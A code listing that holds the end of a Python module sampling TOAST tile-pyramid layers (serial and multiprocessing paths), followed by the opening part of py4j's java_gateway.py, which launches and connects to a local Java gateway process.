pio : :class:`toasty.pyramid.PyramidIO`
A :class:`~toasty.pyramid.PyramidIO` instance to manage the I/O with
the tiles in the tile pyramid.
sampler : callable
The sampler callable that will produce data for tiling.
depth : int
The depth of the layer of the TOAST tile pyramid to generate. The
number of tiles in each layer is ``4**depth``. Each tile is 256×256
TOAST pixels, so the resolution of the pixelization at which the
data will be sampled is a refinement level of ``2**(depth + 8)``.
coordsys : optional :class:`ToastCoordinateSystem`
The TOAST coordinate system to use. Default is
:attr:`ToastCoordinateSystem.ASTRONOMICAL`.
format : optional :class:`str`
If provided, override the default data storage format of *pio* with the
named format, one of the values in ``toasty.image.SUPPORTED_FORMATS``.
parallel : integer or None (the default)
The level of parallelization to use. If unspecified, defaults to using
all CPUs. If the OS does not support fork-based multiprocessing,
parallel processing is not possible and serial processing will be
forced. Pass ``1`` to force serial processing.
cli_progress : optional boolean, defaults False
If true, a progress bar will be printed to the terminal using tqdm.
"""
from .par_util import resolve_parallelism
parallel = resolve_parallelism(parallel)
if parallel > 1:
_sample_layer_parallel(pio, format, sampler, depth, coordsys, cli_progress, parallel)
else:
_sample_layer_serial(pio, format, sampler, depth, coordsys, cli_progress)
def _sample_layer_serial(pio, format, sampler, depth, coordsys, cli_progress):
with tqdm(total=tiles_at_depth(depth), disable=not cli_progress) as progress:
for tile in generate_tiles(depth, bottom_only=True, coordsys=coordsys):
lon, lat = toast_tile_get_coords(tile)
sampled_data = sampler(lon, lat)
pio.write_image(tile.pos, Image.from_array(sampled_data), format=format)
progress.update(1)
if cli_progress:
print()
def _sample_layer_parallel(pio, format, sampler, depth, coordsys, cli_progress, parallel):
import multiprocessing as mp
done_event = mp.Event()
queue = mp.Queue(maxsize = 2 * parallel)
workers = []
for _ in range(parallel):
w = mp.Process(target=_mp_sample_worker, args=(queue, done_event, pio, sampler, format))
w.daemon = True
w.start()
workers.append(w)
# Send out tiles:
with tqdm(total=tiles_at_depth(depth), disable=not cli_progress) as progress:
for tile in generate_tiles(depth, bottom_only=True, coordsys=coordsys):
queue.put(tile)
progress.update(1)
# OK, we're done!
queue.close()
queue.join_thread()
done_event.set()
for w in workers:
w.join()
if cli_progress:
print()
def _mp_sample_worker(queue, done_event, pio, sampler, format):
"""
Process tiles on the queue.
"""
from queue import Empty
while True:
try:
tile = queue.get(True, timeout=1)
except Empty:
if done_event.is_set():
break
continue
lon, lat = toast_tile_get_coords(tile)
sampled_data = sampler(lon, lat)
pio.write_image(tile.pos, Image.from_array(sampled_data), format=format)
def sample_layer_filtered(
pio,
tile_filter,
sampler,
depth,
coordsys=ToastCoordinateSystem.ASTRONOMICAL,
parallel=None,
cli_progress=False,
):
"""Populate a subset of a layer of the TOAST tile pyramid through direct sampling.
Parameters
----------
pio : :class:`toasty.pyramid.PyramidIO`
A :class:`~toasty.pyramid.PyramidIO` instance to manage the I/O with
the tiles in the tile pyramid.
tile_filter : callable
A tile filtering function, suitable for passing to
:func:`toasty.toast.generate_tiles_filtered`.
sampler : callable
The sampler callable that will produce data for tiling.
depth : int
The depth of the layer of the TOAST tile pyramid to generate. The
number of tiles in each layer is ``4**depth``. Each tile is 256×256
TOAST pixels, so the resolution of the pixelization at which the
data will be sampled is a refinement level of ``2**(depth + 8)``.
coordsys : optional :class:`ToastCoordinateSystem`
The TOAST coordinate system to use. Default is
:attr:`ToastCoordinateSystem.ASTRONOMICAL`.
parallel : integer or None (the default)
The level of parallelization to use. If unspecified, defaults to using
all CPUs. If the OS does not support fork-based multiprocessing,
parallel processing is not possible and serial processing will be
forced. Pass ``1`` to force serial processing.
cli_progress : optional boolean, defaults False
If true, a progress bar will be printed to the terminal using tqdm.
"""
from .par_util import resolve_parallelism
parallel = resolve_parallelism(parallel)
if parallel > 1:
_sample_filtered_parallel(pio, tile_filter, sampler, depth, coordsys, cli_progress, parallel)
else:
_sample_filtered_serial(pio, tile_filter, sampler, depth, coordsys, cli_progress)
def _sample_filtered_serial(pio, tile_filter, sampler, depth, coordsys, cli_progress):
n_todo = count_tiles_matching_filter(depth, tile_filter, bottom_only=True, coordsys=coordsys)
with tqdm(total=n_todo, disable=not cli_progress) as progress:
for tile in generate_tiles_filtered(depth, tile_filter, bottom_only=True, coordsys=coordsys):
lon, lat = toast_tile_get_coords(tile)
sampled_data = sampler(lon, lat)
img = Image.from_array(sampled_data)
with pio.update_image(tile.pos, masked_mode=img.mode, default='masked') as basis:
img.update_into_maskable_buffer(basis, slice(None), slice(None), slice(None), slice(None))
progress.update(1)
if cli_progress:
print()
# do not clean lockfiles, for HPC contexts where we're processing different
# chunks in parallel.
def _sample_filtered_parallel(pio, tile_filter, sampler, depth, coordsys, cli_progress, parallel):
import multiprocessing as mp
n_todo = count_tiles_matching_filter(depth, tile_filter, bottom_only=True, coordsys=coordsys)
done_event = mp.Event()
queue = mp.Queue(maxsize = 2 * parallel)
workers = []
for _ in range(parallel):
w = mp.Process(target=_mp_sample_filtered, args=(queue, done_event, pio, sampler))
w.daemon = True
w.start()
workers.append(w)
# Here we go:
with tqdm(total=n_todo, disable=not cli_progress) as progress:
for tile in generate_tiles_filtered(depth, tile_filter, bottom_only=True, coordsys=coordsys):
queue.put(tile)
progress.update(1)
# OK, we're done!
queue.close()
queue.join_thread()
done_event.set()
for w in workers:
w.join()
if cli_progress:
print()
# do not clean lockfiles, for HPC contexts where we're processing different
# chunks in parallel.
def _mp_sample_filtered(queue, done_event, pio, sampler):
"""
Process tiles on the queue.
We use ``pio.update_image`` in case we are in an HPC-type context where
other chunks may be trying to write out the populate the same tiles as us at
the same time.
"""
from queue import Empty
while True:
try:
tile = queue.get(True, timeout=1)
except Empty:
if done_event.is_set():
break
continue
lon, lat = toast_tile_get_coords(tile)
sampled_data = sampler(lon, lat)
img = Image.from_array(sampled_data)
with pio.update_image(tile.pos, masked_mode=img.mode, default='masked') as basis:
img.update_into_maskable_buffer(basis, slice(None), slice(None), slice(None), slice(None))
|
java_gateway.py | # -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java Naming Convention do not recommend to start with an underscore
so clashes become unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
import struct
from subprocess import Popen, PIPE
import subprocess
import sys
import traceback
from threading import Thread, RLock
import weakref
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JJavaError, Py4JNetworkError,
Py4JAuthenticationError,
get_command_part, get_return_value,
register_output_converter, smart_decode, escape_new_line,
is_fatal_error, is_error, unescape_new_line,
get_error_message, compute_exception_message)
from py4j.signals import Signal
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER = "DEFAULT"
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = {"yes", "y", "t", "true"}
server_connection_stopped = Signal()
"""Signal sent when a Python (Callback) Server connection is stopped.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_started = Signal()
"""Signal sent when a Python (Callback) Server connection is started.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_error = Signal()
"""Signal sent when a Python (Callback) Server encounters an error while
waiting for a connection.
Will supply the ``error`` argument, an instance of Exception.
The sender is the CallbackServer instance.
"""
server_started = Signal()
"""Signal sent when a Python (Callback) Server is started
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
server_stopped = Signal()
"""Signal sent when a Python (Callback) Server is stopped
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
pre_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is about to shut down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
post_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is shutted down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
def get_create_new_process_group_kwargs():
"""Ensures that the child process is created in another process group.
This prevents signals such as SIGINT from propagating to the JVM.
"""
if os.name != "nt":
kwargs = {"preexec_fn": os.setpgrp}
else:
kwargs = {"creationflags": subprocess.CREATE_NEW_PROCESS_GROUP}
return kwargs
def set_reuse_address(server_socket):
"""Sets reuse address option if not on windows.
On windows, the SO_REUSEADDR option means that multiple server sockets can
be bound to the same address (it has nothing to do with TIME_WAIT).
"""
if os.name != "nt":
server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def set_default_callback_accept_timeout(accept_timeout):
"""Sets default accept timeout of callback server.
"""
deprecated("set_default_callback_accept_timeout", "1.0",
"CallbackServerParameters")
global DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = accept_timeout
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
:import_str: The class (e.g., java.util.List) or the package
(e.g., java.io.*) to import
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
maven_jar_file = "py4j-{0}.jar".format(__version__)
paths.append(jar_file)
# ant
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
# maven
paths.append(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"../../../py4j-java/target/" + maven_jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
# pip install py4j # On Ubuntu 16.04, where virtualenvepath=/usr/local
# this file is here:
# virtualenvpath/lib/pythonX/dist-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
# pip install --user py4j # On Ubuntu 16.04, where virtualenvepath=~/.local
# this file is here:
# virtualenvpath/lib/pythonX/site-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../../share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True,
java_path="java", create_new_process_group=False,
enable_auth=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
might not be properly closed. This is not usually a problem, but in
case of errors related to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if $JAVA_HOME
is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies, the
Java process will stay alive, which may be a problem for some scenarios
though.
:param enable_auth: If True, the server will require clients to provide an
authentication token when connecting.
:rtype: the port number of the `Gateway` server or, when auth enabled,
a 2-tuple with the port number and the auth token.
"""
popen_kwargs = {}
if not jarpath:
jarpath = find_jar_path()
if not java_path:
java_home = os.environ.get("JAVA_HOME")
if java_home:
java_path = os.path.join(java_home, "bin", "java")
else:
java_path = "java"
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = [java_path, "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
if enable_auth:
command.append("--enable-auth")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
close_stderr = False
if redirect_stderr is None:
stderr = open(os.devnull, "w")
close_stderr = True
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
if create_new_process_group:
popen_kwargs.update(get_create_new_process_group_kwargs())
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
**popen_kwargs)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
# Read the auth token from the server if enabled.
_auth_token = None
if enable_auth:
_auth_token = proc.stdout.readline()[:-1]
# Start consumer threads so process does not deadlock/hangs
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
if close_stderr:
# XXX This will quiet ResourceWarning in Python 3.5+
# This only close the fd in this process, not in the JVM process, which
# makes sense.
quiet_close(stderr)
if enable_auth:
return (_port, _auth_token)
else:
return _port
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
instance, or a JavaObject instance)
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
def get_java_class(java_class):
"""Returns the java.lang.Class of a JavaClass. This is equivalent to
calling .class in Java.
:param java_class: An instance of JavaClass
:rtype: An instance of JavaObject that corresponds to a java.lang.Class
"""
return java_class._java_lang_class
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
if closable is None:
# Do not attempt to close a None. This logs unecessary exceptions.
return
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
if socket_instance is None:
# Do not attempt to close a None. This logs unecessary exceptions.
return
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def set_linger(a_socket):
"""Sets SO_LINGER to true, 0 to send a RST packet. This forcibly closes the
connection and the remote socket should fail on write and should not need
to read to realize that the socket was closed.
Only use on timeout and maybe shutdown because it does not terminate the
TCP connection normally.
"""
l_onoff = 1
l_linger = 0
a_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack(b'ii', l_onoff, l_linger))
def check_connection(a_socket, read_timeout):
"""Checks that a socket is ready to receive by reading from it.
If the read times out, this is a good sign. If the read returns an
empty string, this usually means that the socket was remotely closed.
:param a_socket: The socket to read from.
:param read_timeout: The read_timeout to restore the socket to.
"""
a_socket.settimeout(0.0001)
response = 0
try:
response = a_socket.recv(2)
except socket.timeout:
# Do nothing this is expected!
pass
finally:
a_socket.settimeout(read_timeout)
if response == b"":
raise Exception("The connection was remotely closed.")
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
:param gateway_client: The gatway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
raise Py4JError(
"var is none of Java Object, Java Class or Java Member")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
def do_client_auth(command, input_stream, sock, auth_token):
"""Receives and decodes a auth token.
- If the token does not match, an exception is raised.
- If the command received is not an Auth command, an exception is raised.
- If an exception occurs, it is wrapped in a Py4JAuthenticationError.
- Otherwise, it returns True.
"""
try:
if command != proto.AUTH_COMMAND_NAME:
raise Py4JAuthenticationError("Expected {}, received {}.".format(
proto.AUTH_COMMAND_NAME, command))
client_token = smart_decode(input_stream.readline()[:-1])
# Remove the END marker
input_stream.readline()
if auth_token == client_token:
success = proto.OUTPUT_VOID_COMMAND.encode("utf-8")
sock.sendall(success)
else:
error = proto.ERROR_RETURN_MESSAGE.encode("utf-8")
# TODO AUTH Send error message with the error?
sock.sendall(error)
raise Py4JAuthenticationError("Client authentication failed.")
except Py4JAuthenticationError:
raise
except Exception as e:
logger.exception(
"An exception occurred while trying to authenticate "
"a connection")
raise Py4JAuthenticationError(cause=e)
return True
def _garbage_collect_object(gateway_client, target_id):
try:
try:
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
gateway_client.garbage_collect_object(target_id)
except Exception:
logger.debug(
"Exception while garbage collecting an object",
exc_info=True)
except Exception:
# Maybe logger is dead at this point.
pass
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
try:
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
except Exception:
# Maybe logger used by quiet_* is dead at this point
pass
def _garbage_collect_proxy(pool, proxy_id):
"""Removes a proxy from the pool of python proxies.
Do not remove special proxies such as the entry point.
Note: even though this function starts with _garbage_collect,
it is not called withing a weakref lambda. This is only a private function.
"""
success = False
if proxy_id != proto.ENTRY_POINT_OBJECT_ID:
try:
del(pool[proxy_id])
success = True
except KeyError:
logger.warning(
"Tried to garbage collect non existing python proxy {0}"
.format(proxy_id))
return success
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False,
ssl_context=None, enable_memory_management=True,
read_timeout=None, auth_token=None):
"""
:param address: the address to which the client will request a
connection. If you're assing a `SSLContext` with
`check_hostname=True` then this address must match
(one of) the hostname(s) in the certificate the gateway
server presents.
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method
calls less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect
to the JVM, it shuts down itself and raises an exception.
:param ssl_context: if not None, SSL connections will be made using
this SSLContext
:param enable_memory_management: if True, tells the Java side when a
JavaObject (reference to an object on the Java side) is garbage
collected on the Python side.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a response from the Java side.
:param auth_token: if provided, an authentication that token clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
self.ssl_context = ssl_context
self.enable_memory_management = enable_memory_management
self.read_timeout = read_timeout
self.auth_token = escape_new_line(auth_token)
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True,
ssl_context=None,
accept_timeout=DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER,
read_timeout=None, propagate_java_exceptions=False,
auth_token=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
:param ssl_context: if not None, the SSLContext's certificate will be
presented to callback connections.
:param accept_timeout: if > 0, sets a timeout in seconds after which
the callbackserver stops waiting for a connection, sees if the
callback server should shut down, and if not, wait again for a
connection. The default is 5 seconds: this roughly means that
if can take up to 5 seconds to shut down the callback server.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a call or command from the
Java side.
:param propagate_java_exceptions: if `True`, any `Py4JJavaError` raised
by a Python callback will cause the nested `java_exception` to be
thrown on the Java side. If `False`, the `Py4JJavaError` will
manifest as a `Py4JException` on the Java side, just as with any
other kind of Python exception. Setting this option is useful if
you need to implement a Java interface where the user of the
interface has special handling for specific Java exception types.
:param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
self.ssl_context = ssl_context
if accept_timeout == DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER:
# This is to support deprecated function call...
# TODO Remove "DEFAULT" once we remove the deprecated function
# call.
accept_timeout = DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
self.accept_timeout = accept_timeout
self.read_timeout = read_timeout
self.propagate_java_exceptions = propagate_java_exceptions
self.auth_token = escape_new_line(auth_token)
class DummyRLock(object):
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayConnectionGuard(object):
def __init__(self, client, connection):
self._client = client
self._connection = connection
def __enter__(self):
return self
def read(self, hint=-1):
return self._connection.stream.read(hint)
def __exit__(self, type, value, traceback):
if value is None:
self._client._give_back_connection(self._connection)
else:
self._connection.close()
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT,
auto_close=True, gateway_property=None,
ssl_context=None, gateway_parameters=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
if address != DEFAULT_ADDRESS:
deprecated("GatewayClient.address", "1.0", "GatewayParameters")
if port != DEFAULT_PORT:
deprecated("GatewayClient.port", "1.0", "GatewayParameters")
if not gateway_parameters:
gateway_parameters = GatewayParameters(
address=address, port=port, auto_close=auto_close,
ssl_context=ssl_context)
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
self.is_connected = True
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.ssl_context = gateway_parameters.ssl_context
self.deque = deque()
def garbage_collect_object(self, target_id):
"""Tells the Java side that there is no longer a reference to this
JavaObject on the Python side.
"""
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
target_id != proto.GATEWAY_SERVER_OBJECT_ID and\
self.is_connected:
try:
self.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
